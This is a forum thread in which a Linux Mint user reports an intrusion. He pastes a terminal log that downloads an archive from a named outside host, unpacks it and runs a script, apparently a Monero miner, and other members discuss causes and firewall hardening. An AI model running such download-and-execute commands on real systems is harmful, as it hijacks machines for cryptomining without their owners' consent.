How did I get hacked? - Solved

[PPPeter]

Hi all, hoping someone can help me with some security advice.

I recently installed Linux Mint Cinnamon 18.3 on one of my boxes. I left it running overnight with an open Terminal window (I was running Handbrake on a bunch of my DVDs). The following moning I found evidence in the Terminal window that I had been hacked - the commands below had been run (I've omitted the output from the commands as there was a lot of it):

peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I've done some searching and this appears to be an attempt to hijack my PC to mine some crypto currency (Monero or Aeon, not sure). Anyway, the "screen" command failed (not installed) and the shell script x.sh issued a whole load or error messages so the hacker was out of luck.

I don't have anti-virus installed (I know, big mistake, but lesson learned) but I still don't understand how I got hacked. I only installed software from the Software Centre, and I only visited reputable sites mainly to get info on how to do things in Linux.

I switched the box off (after copying the evidence to another server) and will be reinstalling Linux Mint afresh before I use it again. I'm looking for advice on how to protect myself better, e.g. what anti-virus to install, and anything else I can do.

Thanks in advance.

[PPPeter]

Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitley is necessary

[Moem]

Why do so many people say that you don't need anti-virus for Linux?

Because it's true.

And if even if it's true that you got hacked, that is a very different thing than a virus. Let's not confuse things.

[Pjotr]

Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitley is necessary

More proof please.

And even if you could supply this proof: why do you think that AV would have protected you against this hijack attempt?

[Cosmo.]

After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

This would hd been the most stupid attacker, if he demonstrates his activity inn such an obvious way. Actually this looks for somebody had local access. No AV would be able to do something against that. - And you seem to have done the mistake to at least lock your screen over night.

Or with another attempt to interpret your post: If you should really have done nothing except what you described: Than it would mean, that the attack would had been build inside of your system. Think about it.
If I look at your other post / thread, than it is obvious, that this, what you wrote here (installed nothing from outside of the official repositories) is simply untrue. Think about that also.

[Pjotr]

A hacking attempt has nothing to do at all with a virus. So antivirus certainly wouldn't have helped against this. I advise to remove that newly installed AV from your system, because it'll only make it less secure.

It looks like a local attack: somebody who had physical access to your computer. If you leave the computer on during your absence, make sure that your screen is locked with a password.

Or even better: lock the room in which you've put your computer, because physical access will always remain a risk. No matter what.

Keep your system fully updated, don't install stuff from non-official repo's, be careful with browser add-ons, sandbox some high-risk applications (web browsers!) with Firejail and above all: use your common sense. Do all that, and then: relax, you're running Linux.

[Pjotr]

This is the link to the separate topic that PPPeter has started for his problem:
viewtopic.php?f=18&t=263447

--Edit: rectified.

[Cosmo.]

This thread is, what I mentioned in my last sentence.

[Pjotr]

This thread is, what I mentioned in my last sentence.

Yes, sorry, my wording was inexact. I'll rectify my previous message.

[Cosmo.]

Alone the line, where "chmod" had been mistyped at first makes it obvious, that there was a human at work.

[tdockery97]

You may want to turn your firewall on also.

[PPPeter]

Proof: these are the commands (output omitted for brevity) I found in the terminal window:
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I agree, it must have been a very stupid atacker. And no, it was not someone sitting at the computer, unless they broke into my property while I was asleep and did nothing else other than sit at my PC and run a few commands. Yes, I did leave the computer unlocked - a mistake I won't make again. Clearly you guys think I'm trolling, I'm not, I'm just relaying my experience. Maybe you are right, maybe anti-virus wouldn't have helped, in which case please tell me what would have helped. And don't insinuate that I am lying. I don't even know how to install anything outside of the software center and I have never access my email accounts in Linux.

[PPPeter]

Thanks for the replies. I am 100% certain it was not a local attack, I live alone and my property is secure. I haven't yet installed an anti-virus, perhaps I don't need to. I will certainly be more security conscious in future and shutdown the PC whenever I am not physically present. I only left it on as I was running Handbrake in batch mode. That's all done now.

Re switching on firewall, Steve Gibson's "Shields Up" gives my router a "perfect TruStealth" rating, whatever that means. Do I need to configure anything in Linux for a firewall?

Thanks again.

[Pierre]

the firewall in LinuxMint is installed, but not Turned On:

Open a Terminal and type

Code: Select all

sudo ufw status

and that will tell you if the firewall is active or not. If it isn't then type

Code: Select all

sudo ufw enable

[PPPeter]

Great stuff. Thanks very much!

[thx-1138]

https://www.virustotal.com/#/file/21587 ... /detection
So you can be certain that AV wouldn't have helped...

...it appears to be a Monero miner btw:
https://github.com/fireice-uk/xmr-stak

[greerd]

I don't see how remote access would open or leave open a terminal window on your desktop by using ssh or any terminal access, the only way that this could be done (afaik) is to use a vnc program that logs into DESKTOP:0.

You mentioned in an earlier post that you searched for info on vnc, did you go through setting up Desktop Sharing (vino)? If so did you leave it enabled and leave all security settings unchecked?

The firewall in Mint isn't enabled by default, was it enabled (to default allow-out, deny-in) during you episode?

[chrisuk]

Assuming that I've not misunderstood your post:

Just to dispel the myth... Linux is not magically immune to malware, you're just less likely to be infected in Linux than Windows. Note the "less likely", regardless of what others will continually tell you, it is not impossible.

Now, if you are 100% certain that nobody had physical access to your machine, and you don't have multiple personalities (I'm being serious, some people have such an illness) - then you was either hacked or you have a Poltergeist. Either way, it warrants further investigation. If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.

However, I suspect that someone was following an online guide... they never made it to the "Erasing your tracks" section - and the fact you can see all those commands reinforces the idea that they didn't know what they was doing.

So I suggest that you copy/paste your post to other forums more focused on security. You may never find out what happened, and it may never happen again, but you might get a meaningful explanation of what and why... though not who

[Ozo]

Don't be gullible. This poster just signed on so has no history on this forum. My conspiracy theory is that they made this up as they could not actually hack Linux themselves. This could be an attempt at spreading fear among the users. I for one am not afraid which is one reason I can see right through stuff like this.

I apologize to the OP if I am wrong but I do not believe in coincidence.

[Pjotr]

If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.

Nobody said that.

@Ozo: that thought has crossed my mind as well.